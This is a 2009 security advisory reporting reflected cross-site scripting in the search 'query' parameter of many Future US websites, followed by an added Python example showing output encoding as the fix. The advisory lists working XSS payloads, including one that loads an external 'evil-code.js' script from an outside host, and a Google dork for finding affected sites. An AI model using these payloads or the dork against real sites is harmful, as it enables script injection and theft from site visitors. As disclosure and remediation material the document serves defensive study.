
Copyright 2008 Future US Cross Site Scripting

20 Jan 2009 00:00:00 | Reported by Ivan Sanchez | Type: packetstorm | Source: packetstormsecurity.com | 31 Views

Copyright 2008 Future US Cross Site Scripting. Exploitable cross-site scripting vulnerability in multiple domains

Code
` NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+===================================================================================================================+  
+ Copyright 2008 - Copyright 2008 Future US //Cross-site scripting (XSS) Remote Java Execution +  
+===================================================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: Copyright 2008 Future US   
  
  
  
http://www.futureus-inc.com/  
http://www.dailyradar.com/  
  
Date: 16/01/2009  
  
  
Many domains are affected:  
---------------------------  
  
MovieBlips - Your daily movie news  
ShowHype - Biggest stories, best fans  
TVBlips - For TV aficionados only  
42Blips - For science fiction fans  
ComicsBlips - Excelsior! Comics news galore!  
TotalFilm - Welcome to the movies!  
BallHype - Best stories, biggest fans  
ActionSportsBlips - Surf, Skate, Ski, Snowboard  
BikeRadar - The world is for riding  
MMABlips - News to fight for  
RacingBlips - News built for speed  
CyclingNews - The world centre of cycling  
WallStreetBlips - Show me the money  
BeltwayBlips - All politics, all the time  
EarthBlips - Re-imagine the planet  
  
  
and many more...  
  
Exploited from the query string: put some evil XSS code or external Java code into the textbox and you will then see it in the query string,  
or put the evil code directly in the query string.  
  
  
  
GOOGLE DORKS:  
------------  
  
intext:"Copyright 2008 Future US"  
  
  
  
Parameter Affected:  
-------------------  
  
query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E  
  
query="><script>alert(/CCC/)</script>&t=advanced&s=0&d=0&start=60  
  
query="></a><script>alert(1);</script>  
  
  
  
Example url:  
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E  
  
  
Remediation:  
------------  
  
Validate the input.  
`
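The advisory's remediation, worked through as an added example (not code from the advisory or from the affected sites): the same `query` values listed under "Parameter Affected" are reflected once verbatim and once after validation plus HTML encoding for the attribute context. The page template, the function names and the 200-character limit are assumptions made for illustration; note that input validation alone does not stop the break-out, the output encoding does.

```python
import html
import re
from urllib.parse import parse_qs

MAX_QUERY_LEN = 200  # assumed upper bound for a search box value

# Hypothetical search-page template; the sites' real markup is not on the page.
PAGE = '<form action="/search/"><input type="text" name="query" value="{q}"></form>'


def get_query(raw_qs: str) -> str:
    """Extract and percent-decode the 'query' parameter from a raw query string."""
    return parse_qs(raw_qs).get("query", [""])[0]


def render_vulnerable(raw_qs: str) -> str:
    """Reflects the parameter verbatim: the behaviour the advisory describes."""
    return PAGE.format(q=get_query(raw_qs))


def validate_query(q: str) -> str:
    """Input validation: strip control characters and bound the length."""
    return re.sub(r"[\x00-\x1f\x7f]", "", q)[:MAX_QUERY_LEN]


def render_hardened(raw_qs: str) -> str:
    """Validate, then encode for the HTML attribute the value is written into."""
    q = validate_query(get_query(raw_qs))
    return PAGE.format(q=html.escape(q, quote=True))


def breaks_out(page: str) -> bool:
    """True if reflected input produced a live script tag (the template has none)."""
    return "<script" in page.lower()


# Query strings copied from the advisory's "Parameter Affected" section.
SAMPLES = [
    'query="><script>alert(/CCC/)</script>&t=advanced&s=0&d=0&start=60',
    'query="></a><script>alert(1);</script>',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print("vulnerable:", breaks_out(render_vulnerable(s)),
              "| hardened:", breaks_out(render_hardened(s)))
```

A `Content-Security-Policy` header that disallows inline and third-party scripts is a useful second layer on top of the encoding, since it also limits the external `script src` variant shown in the advisory.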
